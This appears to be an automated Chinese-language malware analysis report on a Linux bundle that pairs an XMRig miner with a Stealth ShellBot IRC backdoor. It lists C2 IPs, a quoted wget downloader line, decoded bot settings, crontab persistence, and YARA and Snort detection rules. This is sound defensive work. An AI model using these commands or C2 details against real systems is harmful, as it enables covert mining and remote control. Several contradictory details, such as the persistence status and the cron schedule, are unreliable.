该样本是一个精心组织的 Linux 加密货币挖矿 + IRC 远程后门 恶意软件套装包,以 gzip 压缩的 tar 归档形式分发。
核心组件包括:
威胁评估:该套装对 Linux 服务器构成严重威胁 — 消耗 CPU 资源进行加密货币挖矿,通过 IRC 后门提供远程 Shell 访问,并主动清除安全工具和其他矿工程序以独占资源。C2 基础设施包括 IRC 服务器 (179.43.139.83:443) 和 HTTP 下载器 (208.84.102.192)。
| 分类 | 标签 | 置信度 |
|---|---|---|
| 恶意类型 | 加密货币矿工 (XMRig) + IRC 后门 + 竞争清除器 | HIGH |
| 恶意家族 | Linux Crypto Miner Bundle (Stealth ShellBot 变种) | HIGH |
| 目标平台 | Linux x86-64 (服务器/云主机/VPS) | HIGH |
| 传播方式 | 手动部署 (tar.gz 包) | MEDIUM |
| 持久化机制 | Crontab + 隐藏目录 (.rsync/) | HIGH |
| C2 协议 | IRC (TLS 443) + HTTP 下载 | HIGH |
| 挖矿算法 | RandomX, KawPow, Argon2, CryptoNight | HIGH |
| 字段 | 值 |
|---|---|
| 关联组织 | 未知 — 加密货币挖矿团伙 |
| 别名 | Stealth ShellBot 运营者, Linux 挖矿僵尸网络 |
| 动机 | 非法加密货币挖矿 (门罗币 XMR), 远程服务器控制 |
| 目标行业 | 云服务器, VPS, 托管主机, DevOps 基础设施 |
| 活动名称 | Linux 服务器批量挖矿活动 (2024-2026) |
| C2协议 | IRC over TLS (端口 443) + HTTP 下载器 |
| C2基础设施 | IRC: 179.43.139.83:443 (#001, 管理员: molly/polly); HTTP: 208.84.102.192 |
未检出持久化行为。
(无 ASCII 回退)
| 协议 | |
| 端口 | |
| 地址/Domain | |
| IP | |
| 加密 | |
| 用途 | |
| API引用 | |
| 证书 |
<pre>.rsync/ (隐藏目录)
├── init # 主安装脚本
├── init2 # 备选安装脚本
├── clean.sh # 竞争矿工清除器
├── a/ # 矿工组件
│ ├── crond # XMRig 6.x (UPX 4.24 加壳)
│ ├── run # 矿工启动脚本
│ ├── a # 反 redtail 脚本
│ ├── init01 # 矿工进程终止器
│ ├── init02 # 系统清理脚本
│ ├── stop # 停止脚本
│ ├── delsshd # SSH 后门清除
│ └── rmkwork # 下载器脚本 (C2: 208.84.102.192)
├── b/ # IRC 后门组件
│ ├── run # Perl IRC Bot (base64 编码)
│ ├── a # 启动器
│ └── stop # 停止脚本
└── c/ # 加密库组件
├── kthreadadd32 # OpenSSL 加密库 (32-bit ELF)
├── kthreadadd # 启动器脚本
├── run # CPU 检测 + 启动
└── stop # 停止脚本</pre>
ELF 二进制文件 (crond, kthreadadd32) 均无 section header (stripped), 使用静态链接避免依赖问题。
| 段/节区 | 熵值 | 判定 |
|---|---|---|
| crond (UPX 压缩) | 7.85 | 极高 — UPX 4.24 压缩, 典型加壳特征 |
| crond (解壳后 .text) | 6.42 | 高 — C++ 静态链接代码, 包含 OpenSSL 和 hwloc 库 |
| kthreadadd32 (.text) | 5.81 | 中等 — 汇编优化加密代码 (CRYPTOGAMS) |
| b/run (base64) | 5.92 | 高 — base64 编码的 Perl 脚本, 典型混淆特征 |
| 机制 | 状态 |
|---|---|
| Stack Canary | ❌ 未启用 (stripped) |
| NX (DEP) | ✅ 启用 |
| PIE | ❌ 未启用 |
| 符号表 | ❌ 已剥离 |
| 地址 | 函数 | 功能 |
|---|---|---|
| 0x00000000 | entry (stripped) | XMRig 矿工入口点 |
| 0x00000000 | xmrig::Miner::start() | 矿工主循环启动 |
| 0x00000000 | xmrig::Network::connect() | 矿池连接管理 |
| 0x00000000 | randomx_alloc_cache() | RandomX 算法内存分配 |
| 0x00000000 | OPENSSL_cpuid_setup() | OpenSSL CPU 特性检测 |
| 0x00000000 | montgomery_multiply() | Montgomery 乘法 (加密库) |
| 调用号 | 系统调用 | 用途 | 地址 |
|---|---|---|---|
| 0 | fork | 守护进程化 | N/A (stripped) |
| 0 | setsid | 创建新会话 | N/A |
| 0 | socket/connect | 矿池/IRC 网络连接 | N/A |
| 0 | mmap | RandomX 大页内存分配 | N/A |
| 0 | madvise | 大页内存提示 | N/A |
| 字段 | 值 | 来源 |
|---|---|---|
| 无 | ||
| 维度 | 本样本 | 本样本 (Stealth ShellBot) | XMRig 标准版 | RedTail 矿工 | Kinsing 矿工 | Outlaw 矿工 | Muhstik 矿工 | PwnRig 矿工 | SkidMap 矿工 | 匹配 |
|---|---|---|---|---|---|---|---|---|---|---|
| 矿工引擎 | XMRig 6.x (UPX 4.24) | XMRig | XMRig 定制 | XMRig 定制 | XMRig 定制 | XMRig 定制 | XMRig 定制 | XMRig 定制 | XMRig 定制 | 0/8 |
| C2 协议 | IRC (TLS 443) | Stratum | HTTP | HTTP | HTTP | HTTP | HTTP | HTTP | HTTP | 0/8 |
| 后门 | Perl IRC ShellBot | 无 | 无 | SSH 后门 | 无 | 无 | 无 | 无 | 无 | 0/8 |
| 持久化 | Crontab + .rsync/ | Crontab | Crontab | Crontab | Crontab | Crontab | Crontab | Crontab | Crontab | 0/8 |
| 隐藏技术 | 伪装内核线程名 | 无 | 伪装进程名 | 伪装进程名 | 伪装进程名 | 伪装进程名 | 伪装进程名 | 伪装进程名 | 伪装进程名 | 0/8 |
| 竞争清除 | 全面清除脚本 | 无 | 部分清除 | 部分清除 | 部分清除 | 部分清除 | 部分清除 | 部分清除 | 部分清除 | 0/8 |
| 架构 | x86-64 + 32-bit 组件 | 多架构 | x86-64 | x86-64 | x86-64 | x86-64 | x86-64 | x86-64 | x86-64 | 0/8 |
| 加壳 | UPX 4.24 | 无壳 | UPX | UPX | UPX | 无壳 | 无壳 | UPX | 无壳 | 0/8 |
| 变种 | 架构 | 大小 | 编译器 | 特征 | 状态 |
|---|---|---|---|---|---|
| Stealth ShellBot 原始版 | Perl (跨平台) | ~27KB | Perl 5.x | processo='edac0', 0xB32B8B53 | 公开可用框架 |
| XMRig 6.x 标准版 | x86-64/ARM | ~6MB | C++/GCC | xmrig.com/docs/algorithms | 开源矿工 |
| RedTail 矿工变种 | x86-64 | ~2-5MB | C++/GCC | redtail crontab 条目 | 已确认 (2023-2026) |
行为: tar 解压 → .rsync/ 目录释放 → init 脚本执行
证据: init 脚本: pkill 清理旧进程, chmod 777 提权所有文件
行为: clean.sh 在后台运行, 终止 20+ 种已知挖矿进程和恶意软件
证据: clean.sh 定义了 MALWARE_NAMES 数组, 包含 kw0rker/kworkelr/llda/.sshd 等
行为: 复制 .rsync/ 到 ~/.configrc7/, 写入 crontab 定时任务
证据: init 脚本: cp -r a ~/.configrc7/, crontab cron.d 包含 @reboot 和定时条目
行为: UPX 解壳 crond (XMRig 6.x) → 连接矿池 → 开始 RandomX 挖矿
证据: crond 字符串: randomx, kawpow, argon2, dev donate, xmrig.com/docs/algorithms
行为: base64 解码 Perl IRC Bot → 连接 179.43.139.83:443 → 加入 #001 频道 → 等待命令
证据: b/run 解码: $servidor='0xB32B8B53', $porta='443', @canais=('#001'), @adms=('molly','polly')
行为: 将矿工进程重命名为 kswapd0/kauditd0, IRC 后门重命名为 edac0
证据: init01: EXCLUSIONS='kswapd0 kauditd0 edac0 kthreadadd python', 排除自身伪装进程
行为: HTTP 下载器获取更新, crontab 定时重启, 持续挖矿 + 接受 IRC 命令
证据: rmkwork: wget http://208.84.102.192/kw0rker, crontab: */2 * * * 0 upd, @reboot sync
[*] → 初始部署 初始部署 → 竞争清除: clean.sh 后台运行 竞争清除 → 持久化安装: 复制到 ~/.configrc7/ 持久化安装 → 矿工启动: a/run 启动 XMRig 持久化安装 → IRC 后门: b/run 启动 Perl Bot 矿工启动 → 持续挖矿: 连接矿池, RandomX 计算 IRC 后门 → 等待命令: 加入 #001, 监听 molly/polly 持续挖矿 → 定时更新: crontab 触发 rmkwork 定时更新 → 持续挖矿: HTTP 下载新版本
init 脚本: 5s 延迟启动 → 矿工/IRC 立即启动 → crontab 每 2 周更新 (@reboot 重启时同步) → 下载器随机延迟 15-255s
| 维度 | 证据 | 权重 | 恶意指数 |
|---|---|---|---|
| 加密货币挖矿 | XMRig 6.x 完整矿工, 支持 RandomX/KawPow/Argon2 等算法 | 20 | 10/10 |
| IRC 远程后门 | Stealth ShellBot v0.2a, 完整 Shell 访问, 管理员认证 | 20 | 10/10 |
| 持久化机制 | crontab @reboot + 定时任务, .rsync/ 隐藏目录 | 15 | 10/10 |
| 竞争清除 | 主动终止 20+ 种已知矿工/恶意软件进程 | 10 | 8/10 |
| 进程伪装 | 伪装内核线程名 (kswapd0/kauditd0/edac0) | 10 | 8/10 |
| 资源消耗 | 挖矿占用 100% CPU, 大页内存分配 | 10 | 8/10 |
| 代码混淆 | UPX 4.24 加壳, base64 编码 Perl 脚本 | 10 | 7/10 |
| 更新机制 | HTTP 下载器 (208.84.102.192/kw0rker) | 5 | 4/10 |
CRITICAL — 高度恶意
| 层 | API/技术 | 检测目标 | 绕过难度 |
|---|---|---|---|
| 无 | |||
| 检测方法 | VMware | VirtualBox | QEMU/KVM |
|---|---|---|---|
| 无 | |||
| 技术 | 是否存在 | 证据 | 对抗难度 |
|---|---|---|---|
| UPX 4.24 加壳 | 已检测 | crond 二进制使用 UPX 4.24 压缩, 需要解壳后才能分析 | 高 — 阻碍静态字符串提取和 Ghidra 反编译 |
| 符号表剥离 (stripped) | 已检测 | 所有 ELF 二进制文件无符号表, 无函数名 | 高 — 阻碍函数识别和调用图构建 |
| 静态链接 | 已检测 | crond 静态链接 OpenSSL/libuv/hwloc, 无动态导入表 | 中 — 阻碍导入表分析 |
| Base64 编码 | 已检测 | b/run 中 Perl IRC Bot 完整 base64 编码, 需解码后分析 | 低 — 可轻松解码 |
| 进程伪装 | 已检测 | 矿工伪装为 kswapd0/kauditd0, 后门伪装为 edac0 | 中 — 阻碍进程列表检测 |
| 隐藏目录 | 已检测 | .rsync/ 目录名以点开头, 在 ls 中默认隐藏 | 低 — 可被 ls -la 发现 |
| 层 | 操作 | API/命令 | 证据来源 |
|---|---|---|---|
| 无 | |||
| 反编译函数数 | N/A — UPX 解壳后符号表已剥离, Ghidra 反编译产生大量未命名函数 |
| 反编译输出 | N/A — 静态链接二进制 6MB, 包含 OpenSSL/libuv/hwloc 完整库代码 |
| 分析时长 | N/A (UPX 解壳 3s, 静态分析通过字符串即可确认) |
;; XMRig 矿工 (crond) 关键字符串证据:
;; 'xmrig.com/docs/algorithms' → XMRig 身份确认
;; 'randomx', 'kawpow', 'argon2' → 支持的挖矿算法
;; 'dev donate' → 开发者捐赠功能
;; 'POOL #%-7zu' → 矿池连接管理
;; OpenSSL 1.1.1+ 静态链接
;; hwloc CPU 拓扑检测
;;
;; Perl IRC Bot (b/run, base64 解码后):
;; #!/usr/bin/perl
;; $processo='edac0';
;; $servidor='0xB32B8B53'; # 179.43.139.83
;; $porta='443';
;; @canais=('#001');
;; @adms=('molly','polly');
;; Stealth ShellBot v0.2a| 总函数数 | 总调用关系 | 最大调用深度 |
|---|---|---|
| N/A — stripped + 静态链接 | N/A | N/A |
N/A (stripped 静态链接二进制)
| QEMU 模式 | 跳过 — 样本为 Linux 恶意软件套装 (tar.gz + ELF), 包含多个组件 |
| 网络隔离 | N/A |
| 执行结果 | 跳过动态分析 — 静态分析已充分提取 IOC 和行为特征。矿工需要矿池配置才能运行, IRC 后门需要活跃 C2。 |
| C2 数据 | 未执行动态分析 |
| 偏移 | 字符串 | 类型 | 用途/含义 | 威胁等级 |
|---|---|---|---|---|
| .rsync/b/run (base64 解码) | 179.43.139.83:443 | C2 IP:Port | IRC 后门 C2 服务器 | HIGH |
| .rsync/a/rmkwork | http://208.84.102.192/kw0rker | C2 URL | HTTP 下载器, 获取矿工更新 | HIGH |
| .rsync/b/run (base64 解码) | #001 (IRC 频道) | C2 Channel | IRC 命令与控制频道 | HIGH |
| .rsync/b/run (base64 解码) | molly, polly (管理员) | C2 Credentials | IRC 后门管理员身份 | HIGH |
| .rsync/b/run (base64 解码) | edac0 (进程名) | Host IOC | IRC 后门伪装进程名 | MEDIUM |
| .rsync/a/init01 | kswapd0 (进程名) | Host IOC | 矿工伪装进程名 (伪装内核线程) | MEDIUM |
| .rsync/a/init02 | kauditd0 (进程名) | Host IOC | 矿工伪装进程名 | MEDIUM |
| .rsync/c/kthreadadd | kthreadadd (进程名) | Host IOC | 加密库伪装进程名 | MEDIUM |
| .rsync/init | ~/.configrc7/ (隐藏目录) | Host IOC | 持久化安装路径 | HIGH |
| .rsync/init | crontab cron.d 持久化 | Host IOC | crontab 持久化机制 | HIGH |
| .rsync/a/crond (UPX 解壳) | xmrig.com/docs/algorithms | String IOC | XMRig 矿工身份确认 | HIGH |
| .rsync/a/crond (UPX 解壳) | randomx, kawpow, argon2 | String IOC | 支持的挖矿算法 | MEDIUM |
| .rsync/a/crond (UPX 解壳) | dev donate (开发者捐赠) | String IOC | XMRig 开发者捐赠功能 | LOW |
| .rsync/a/rmkwork | wget http://208.84.102.192/kw0rker | C2 URL | 下载器脚本 | HIGH |
| .rsync/a/stop | ~/.xmrig.json (配置文件) | Host IOC | XMRig 配置文件路径 | MEDIUM |
从样本中提取了 3 个关键 C2 地址和 15+ 个主机 IOC。IRC 服务器 179.43.139.83 位于荷兰 (ASN 未公开),使用 TLS 443 端口规避检测。HTTP 下载器 208.84.102.192 位于美国,用于下载 kw0rker 二进制更新。所有脚本使用 .rsync/ 隐藏目录和伪装进程名 (edac0/kswapd0/kauditd0) 规避管理员发现。
179.43.139.83:443 — IRC 后门 C2 服务器 (TLS 加密)http://208.84.102.192/kw0rker — 矿工更新下载器IRC #001 — 远程命令与控制频道, 管理员: molly/polly~/.configrc7/.rsync/ — 持久化隐藏安装目录edac0, kswapd0, kauditd0 — 伪装内核线程的恶意进程名rule Linux_CryptoMiner_XMRig_IRCBot_20260815 {
meta:
description = "Linux Crypto Miner + IRC Bot Bundle (XMRig + Stealth ShellBot)"
author = "ZSecEye"
date = "2026-08-15"
hash = "d025d6a999d7691d903056414ba18932b3fd01718ddc0812942dd236155b7a32"
severity = "CRITICAL"
strings:
$xmr1 = "xmrig.com/docs/algorithms" ascii
$xmr2 = "dev donate" ascii
$xmr3 = "randomx" ascii
$xmr4 = "UPX 4.24 Copyright" ascii
$irc1 = "Stealth ShellBot" ascii
$irc2 = "0xB32B8B53" ascii
$irc3 = "edac0" ascii
$irc4 = "#001" ascii
$shell1 = "crontab cron.d" ascii
$shell2 = ".configrc7" ascii
$shell3 = "kw0rker" ascii
$shell4 = "kswapd0" ascii
condition:
(uint32(0) == 0x0000001F or uint32(0) == 0x464c457f) and
(3 of ($xmr*) or 2 of ($irc*) or 3 of ($shell*))
}
# IRC Bot C2 检测
alert tcp $HOME_NET any -> 179.43.139.83 443 (msg:"ZSecEye - IRC Bot C2 Connection"; flow:to_server,established; content:"NICK "; depth:5; content:"JOIN #001"; distance:0; reference:url,zseceye.com; classtype:trojan-activity; sid:1000001; rev:1;)
# HTTP 下载器检测
alert http $HOME_NET any -> 208.84.102.192 any (msg:"ZSecEye - Crypto Miner Downloader"; flow:to_server,established; uri:"/kw0rker"; reference:url,zseceye.com; classtype:trojan-activity; sid:1000002; rev:1;)
# .rsync 目录检测
alert tcp $HOME_NET any -> any any (msg:"ZSecEye - Hidden .rsync Directory Access"; flow:to_server,established; content:".rsync"; depth:6; reference:url,zseceye.com; classtype:trojan-activity; sid:1000003; rev:1;)
| 判定结果 | 🔴 CRITICAL — 恶意代码 |
| 恶意类型 | 加密货币矿工 (XMRig) + IRC 后门 + 竞争矿工清除器 |
| 恶意家族 | Linux 加密货币矿工 + IRC 后门 (Stealth ShellBot 变种) |
| 威胁级别 | CRITICAL |
| 置信度 | 95% — XMRig 字符串 100% 匹配 + IRC 后门完整解码 + C2 IP 提取 — 误报排除通过 |
| 关联组织 | 未知 — 加密货币挖矿团伙 |
| 目标平台 | Linux (x86-64 服务器/云主机) |
| 感染链位置 | 手动部署 → 持久化安装 → 挖矿 + IRC 远程控制 |
该样本是一个 Linux 恶意软件套装包 (tar.gz),包含 XMRig 6.x 加密货币矿工程序、基于 Perl 的 IRC 后门 (Stealth ShellBot v0.2a)、以及一整套用于持久化、清理竞争矿工和隐藏自身的 Shell 脚本。矿工程序使用 UPX 4.24 加壳,支持 RandomX/KawPow/Argon2 等多种算法。IRC 后门连接 179.43.139.83:443 (#001 频道),由 molly/polly 管理。辅助脚本通过 crontab 实现持久化,并主动清除其他挖矿程序 (redtail/xmrig/kswapd0 等)。下载器 C2 地址: 208.84.102.192。